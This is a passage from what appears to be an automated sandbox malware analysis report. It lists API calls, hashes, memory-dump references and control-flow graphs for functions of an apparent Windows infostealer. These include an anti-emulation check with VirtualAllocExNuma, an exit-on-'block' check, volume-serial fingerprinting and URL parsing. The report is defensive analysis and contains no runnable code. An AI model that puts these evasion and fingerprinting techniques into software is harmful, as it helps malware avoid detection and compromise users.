                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 5411a908f745bee67b80e2f08aecd1969b6c47a073af3bbcd9f8f0f83a715200
                              • Instruction ID: 040d1640a36bf42d39f5e6eff04c80e8c552dc03e406f4ff50c261c4e6ae1395
                              • Opcode Fuzzy Hash: 5411a908f745bee67b80e2f08aecd1969b6c47a073af3bbcd9f8f0f83a715200
                              • Instruction Fuzzy Hash: 04A25C70A01305DFCB20DF69E448A5ABBF4AF44718F29947DE889EB265DB36DC41CB50
                              Function 00E4FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50013
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E500BD
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E500E1
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E500EC
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50110
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E5011B
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E5013F
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E5015A
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50189
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E50194
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E501C3
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E501CE
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50206
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E50250
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E50288
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E5059B
                              • lstrlen.KERNEL32(00D167A0), ref: 00E505AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E505D7
                              • lstrcat.KERNEL32(00000000,?), ref: 00E505E3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5060E
                              • lstrlen.KERNEL32(00D2F668), ref: 00E50625
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E5064C
                              • lstrcat.KERNEL32(00000000,?), ref: 00E50658
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E50681
                              • lstrlen.KERNEL32(00D166E0), ref: 00E50698
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E506C9
                              • lstrcat.KERNEL32(00000000,?), ref: 00E506D5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E50706
                              • lstrcpy.KERNEL32(00000000,00D28A78), ref: 00E5074B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E5077F
                              • lstrcpy.KERNEL32(00000000,00D2F548), ref: 00E507E7
                              • lstrcpy.KERNEL32(00000000,00D28BB8), ref: 00E50858
                              • lstrcpy.KERNEL32(00000000,fplugins), ref: 00E508CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E50928
                              • lstrcpy.KERNEL32(00000000,00D28C08), ref: 00E509F8
                                • Part of subcall function 00E324E0: lstrcpy.KERNEL32(00000000,?), ref: 00E32528
                                • Part of subcall function 00E324E0: lstrcpy.KERNEL32(00000000,?), ref: 00E3254E
                                • Part of subcall function 00E324E0: lstrcpy.KERNEL32(00000000,?), ref: 00E32577
                              • lstrcpy.KERNEL32(00000000,00D28B28), ref: 00E50ACE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E50B81
                              • lstrcpy.KERNEL32(00000000,00D28B28), ref: 00E50D58
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID: fplugins
                              • API String ID: 2500673778-38756186
                              • Opcode ID: 203e5472038257ffaa6baadc8110b91ae1706e631b56a2d563662fec859e4422
                              • Instruction ID: 500bfbb717231993536f79a925655ace50a9b1c7ca934f4c4d565ef168614165
                              • Opcode Fuzzy Hash: 203e5472038257ffaa6baadc8110b91ae1706e631b56a2d563662fec859e4422
                              • Instruction Fuzzy Hash: 7AE27F71605340CFC734DF29C488B5ABBE0BF88309F5999ADE98D9B252DB31D849CB52
                              Function 00E4F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00D16980), ref: 00E4F315
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F3A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4F3C7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4F47B
                              • lstrcpy.KERNEL32(00000000,00D16980), ref: 00E4F4BB
                              • lstrcpy.KERNEL32(00000000,00D288E8), ref: 00E4F4EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4F59E
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E4F61C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F64C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F69A
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E4F718
                              • lstrlen.KERNEL32(00D289D8), ref: 00E4F746
                              • lstrcpy.KERNEL32(00000000,00D289D8), ref: 00E4F771
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4F793
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F7E4
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E4FA32
                              • lstrlen.KERNEL32(00D28A18), ref: 00E4FA60
                              • lstrcpy.KERNEL32(00000000,00D28A18), ref: 00E4FA8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4FAAD
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4FAFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 398e2a486ff04db0e40f8565688dcca1c56b38a7d489b6c23995f6d6727272e2
                              • Instruction ID: ebfe69317f7e1574d1dd8e27c149d6000b17f3cb1d0717b219b4d5c9401a3891
                              • Opcode Fuzzy Hash: 398e2a486ff04db0e40f8565688dcca1c56b38a7d489b6c23995f6d6727272e2
                              • Instruction Fuzzy Hash: 2EF15D70A01201CFDB24CF69E448A19B7F5BF44B18B29D1BED849AB765D73ADC42CB50
                              Function 00E48CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2721 e48ca0-e48cc4 StrCmpCA 2722 e48cc6-e48cc7 ExitProcess 2721->2722 2723 e48ccd-e48ce6 2721->2723 2725 e48ee2-e48eef call e32a20 2723->2725 2726 e48cec-e48cf1 2723->2726 2728 e48cf6-e48cf9 2726->2728 2729 e48ec3-e48edc 2728->2729 2730 e48cff 2728->2730 2729->2725 2770 e48cf3 2729->2770 2732 e48d84-e48d92 StrCmpCA 2730->2732 2733 e48da4-e48db8 StrCmpCA 2730->2733 2734 e48d06-e48d15 lstrlen 2730->2734 2735 e48e6f-e48e7d StrCmpCA 2730->2735 2736 e48e88-e48e9a lstrlen 2730->2736 2737 e48e56-e48e64 StrCmpCA 2730->2737 2738 e48d30-e48d3f lstrlen 2730->2738 2739 e48dbd-e48dcb StrCmpCA 2730->2739 2740 e48ddd-e48deb StrCmpCA 2730->2740 2741 e48dfd-e48e0b StrCmpCA 2730->2741 2742 e48e1d-e48e2b StrCmpCA 2730->2742 2743 e48e3d-e48e4b StrCmpCA 2730->2743 2744 e48d5a-e48d69 lstrlen 2730->2744 2732->2729 2758 e48d98-e48d9f 2732->2758 2733->2729 2746 e48d17-e48d1c call e32a20 2734->2746 2747 e48d1f-e48d2b call e32930 2734->2747 2735->2729 2750 e48e7f-e48e86 2735->2750 2751 e48ea4-e48eb0 call e32930 2736->2751 2752 e48e9c-e48ea1 call e32a20 2736->2752 2737->2729 2749 e48e66-e48e6d 2737->2749 2753 e48d41-e48d46 call e32a20 2738->2753 2754 e48d49-e48d55 call e32930 2738->2754 2739->2729 2759 e48dd1-e48dd8 2739->2759 2740->2729 2760 e48df1-e48df8 2740->2760 2741->2729 2761 e48e11-e48e18 2741->2761 2742->2729 2745 e48e31-e48e38 2742->2745 2743->2729 2748 e48e4d-e48e54 2743->2748 2755 e48d73-e48d7f call e32930 2744->2755 2756 e48d6b-e48d70 call e32a20 2744->2756 2745->2729 2746->2747 2779 e48eb3-e48eb5 2747->2779 2748->2729 2749->2729 2750->2729 2751->2779 2752->2751 2753->2754 2754->2779 2755->2779 2756->2755 2758->2729 2759->2729 2760->2729 2761->2729 2770->2728 2779->2729 2780 e48eb7-e48eb9 2779->2780 2780->2729 2781 e48ebb-e48ebd lstrcpy 2780->2781 2781->2729
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: a852e87df7a152b81e41159c78ad9ee7819b4858ae0cf97abb1cc859d306602c
                              • Instruction ID: 3ec9788f298a9d20d0652f7626274ed2857bdc0b2a4a1c9f9da21705d310a0c3
                              • Opcode Fuzzy Hash: a852e87df7a152b81e41159c78ad9ee7819b4858ae0cf97abb1cc859d306602c
                              • Instruction Fuzzy Hash: 85517C70A04701DFDB319F79EE88A6FBBF4BB54708F10682DE582E2650DB79E4419B21
                              Function 00E52740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2782 e52740-e52783 GetWindowsDirectoryA 2783 e52785 2782->2783 2784 e5278c-e527ea GetVolumeInformationA 2782->2784 2783->2784 2785 e527ec-e527f2 2784->2785 2786 e527f4-e52807 2785->2786 2787 e52809-e52820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 e52826-e52844 wsprintfA 2787->2788 2789 e52822-e52824 2787->2789 2790 e5285b-e52872 call e571e0 2788->2790 2789->2790
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00E5277B
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00E493B6,00000000,00000000,00000000,00000000), ref: 00E527AC
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E5280F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E52816
                              • wsprintfA.USER32 ref: 00E5283B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                              • String ID: :\$C
                              • API String ID: 2572753744-3309953409
                              • Opcode ID: 017550757e99b7cc9215a71a07dd6763c85996048d17ed6f356ef92ae3dbfa04
                              • Instruction ID: a960c8a4ed4b054ce5ca13fd22d43cf46ef06d2ea974517db73d59c55dda8998
                              • Opcode Fuzzy Hash: 017550757e99b7cc9215a71a07dd6763c85996048d17ed6f356ef92ae3dbfa04
                              • Instruction Fuzzy Hash: 833192B1D04209AFCB14CFB88A859EFBFBCEF59701F10456EE605F7654E2348A448BA1
                              Function 00E34BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2793 e34bc0-e34bce 2794 e34bd0-e34bd5 2793->2794 2794->2794 2795 e34bd7-e34c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call e32a20 2794->2795
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00E34BF7
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00E34C01
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00E34C0B
                              • lstrlen.KERNEL32(?,00000000,?), ref: 00E34C1F
                              • InternetCrackUrlA.WININET(?,00000000), ref: 00E34C27
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: 8ef6e9738ace8b6ba66bd18fe131a0b101507a1544d65a34fd0012dbfc229aa3
                              • Instruction ID: 1cafece511344c7d9d64a036da5412c64f58495ff2da98007b39e7cbcc1c0a2a
                              • Opcode Fuzzy Hash: 8ef6e9738ace8b6ba66bd18fe131a0b101507a1544d65a34fd0012dbfc229aa3
                              • Instruction Fuzzy Hash: 51011B71D00218ABDB14DFA9E849B9EBBA8AB08324F00812AF954E7290DB7459048BD4
                              Function 00E31030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2798 e31030-e31055 GetCurrentProcess VirtualAllocExNuma 2799 e31057-e31058 ExitProcess 2798->2799 2800 e3105e-e3107b VirtualAlloc 2798->2800 2801 e31082-e31088 2800->2801 2802 e3107d-e31080 2800->2802 2803 e310b1-e310b6 2801->2803 2804 e3108a-e310ab VirtualFree 2801->2804 2802->2801 2804->2803
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E31046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E3104D
                              • ExitProcess.KERNEL32 ref: 00E31058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E3106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00E310AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: 3fa25c0b14ff567182957af739dc5c242d8e4979edc8f7cf54229136ae75846e
                              • Instruction ID: c1d6fd5f463c1a7e8e3ce8f00d29aaccef12136943ccd0e3c6f6cde0420852d3
                              • Opcode Fuzzy Hash: 3fa25c0b14ff567182957af739dc5c242d8e4979edc8f7cf54229136ae75846e
                              • Instruction Fuzzy Hash: DC01F4717403047FFB244AA5AC1EF6B7BADA784B09F308018F784F72C0D9B6E9008A64
                              Function 00E4EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2805 e4ee90-e4eeb5 call e32930 2808 e4eeb7-e4eebf 2805->2808 2809 e4eec9-e4eecd call e36c40 2805->2809 2808->2809 2810 e4eec1-e4eec3 lstrcpy 2808->2810 2812 e4eed2-e4eee8 StrCmpCA 2809->2812 2810->2809 2813 e4ef11-e4ef18 call e32a20 2812->2813 2814 e4eeea-e4ef02 call e32a20 call e32930 2812->2814 2820 e4ef20-e4ef28 2813->2820 2823 e4ef04-e4ef0c 2814->2823 2824 e4ef45-e4efa0 call e32a20 * 10 2814->2824 2820->2820 2822 e4ef2a-e4ef37 call e32930 2820->2822 2822->2824 2831 e4ef39 2822->2831 2823->2824 2827 e4ef0e-e4ef0f 2823->2827 2830 e4ef3e-e4ef3f lstrcpy 2827->2830 2830->2824 2831->2830
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4EEC3
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E4EEDE
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E4EF3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
